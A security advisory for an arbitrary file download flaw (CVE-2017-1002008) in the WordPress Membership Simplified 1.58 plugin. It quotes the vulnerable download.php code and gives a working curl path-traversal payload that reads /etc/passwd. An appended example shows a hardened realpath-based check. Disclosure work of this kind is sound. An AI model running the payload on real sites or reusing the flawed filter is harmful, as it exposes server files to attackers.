WordPress Membership Simplified 1.58 Arbitrary File Download

Larry W. Cashdollar, packetstormsecurity.com (PACKETSTORM:141662), 2017-03-16

EPSS: 0.039 (Low), percentile 92.0%

Title: Arbitrary file download vulnerability in WordPress Plugin Membership Simplified v1.58
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-13
CVE-ID: CVE-2017-1002008
Download Site: https://wordpress.org/plugins/membership-simplified-for-oap-members-only
Vendor: https://profiles.wordpress.org/williamdeangelis/
Vendor Notified: 2017-03-13
Vendor Contact: [email protected]
Advisory: http://www.vapidlabs.com/advisory.php?v=187
Description: Membership Simplified allows you to generate membership lessons with templated content to create a unified look and feel throughout your courses.

Vulnerability:
The file download code located in membership-simplified-for-oap-members-only/download.php does not check whether a user is logged in and has download privileges. The path check on line 5 can be defeated with a ..././ pattern: str_replace() makes a single, non-recursive pass, so stripping the inner "../" from each ..././ leaves the desired ../ behind. Excerpt of download.php (line numbers as in the advisory, excerpt ends where the advisory's does):

```php
3 $path = substr(getcwd(), 0, -50). "uploads/membership-simplified-for-oap-members-only/"; // change the path to fit your websites document structure
4 $fullPath = $path.$_GET['download_file'];
5 $fullPath = str_replace("../","",$fullPath);
6
7 if ($fd = fopen($fullPath, "r")) {
8     $fsize = filesize($fullPath);
9     $path_parts = pathinfo($fullPath);
10    $ext = strtolower($path_parts["extension"]);
11    switch ($ext) {
12        case "pdf":
13            header("Content-type: application/pdf"); // add here more headers for diff. extensions
14            header("Content-Disposition: attachment; filename=\"".$path_parts["basename"]."\""); // use 'attachment' to force a download
15            break;
16        default;
17            header("Content-type: application/octet-stream");
18            header("Content-Disposition: filename=\"".$path_parts["basename"]."\"");
19    }
20    header("Content-length: $fsize");
21    header("Cache-control: private"); //use this to open files directly
22    while(!feof($fd)) {
23        $buffer = fread($fd, 2048);
24        echo $buffer;
```

Exploit Code:

```shell
$ curl http://example.com/wordpress/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././..././..././..././..././..././etc/passwd
```
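As an added illustration (not part of the advisory or the plugin's code), the PHP below puts the single-pass str_replace() filter from download.php next to a realpath()-based containment check, run on a constructed temporary upload directory; the helper names weak_sanitize and safe_resolve are hypothetical, and the missing login/capability check is a separate fix not shown here.

```php
<?php
// Added example, not the plugin's code. The directory and file names below are constructed.

// Vulnerable approach: one non-recursive str_replace() pass over the joined path.
function weak_sanitize(string $base, string $name): string
{
    return str_replace("../", "", $base . $name);
}

// Hardened approach: resolve the requested file and require it to stay inside $base.
// Returns the resolved path, or null when the file is missing or escapes $base.
function safe_resolve(string $base, string $name): ?string
{
    if (strpos($name, "\0") !== false) {
        return null; // reject NUL bytes before any filesystem call
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $name);
    if ($target === false) {
        return null; // nonexistent file, or a component such as "..." that is not a directory
    }
    // Compare against base plus a separator so "/base-evil" is not mistaken for "/base/...".
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Constructed upload directory holding one legitimate lesson file.
$base = sys_get_temp_dir() . "/ms-uploads-demo";
@mkdir($base, 0700, true);
file_put_contents("$base/lesson1.pdf", "demo");

$traversal = "..././..././..././etc/passwd";

// The filter collapses each "..././" into "../", so the traversal survives the filter.
echo weak_sanitize("$base/", $traversal), "\n";

// Containment check: the legitimate file resolves, both traversal forms are refused.
var_dump(safe_resolve($base, "lesson1.pdf") !== null);          // legitimate download inside $base
var_dump(safe_resolve($base, $traversal));                       // "..." is not a real directory
var_dump(safe_resolve($base, "../../../../../../etc/passwd"));   // resolves outside $base
```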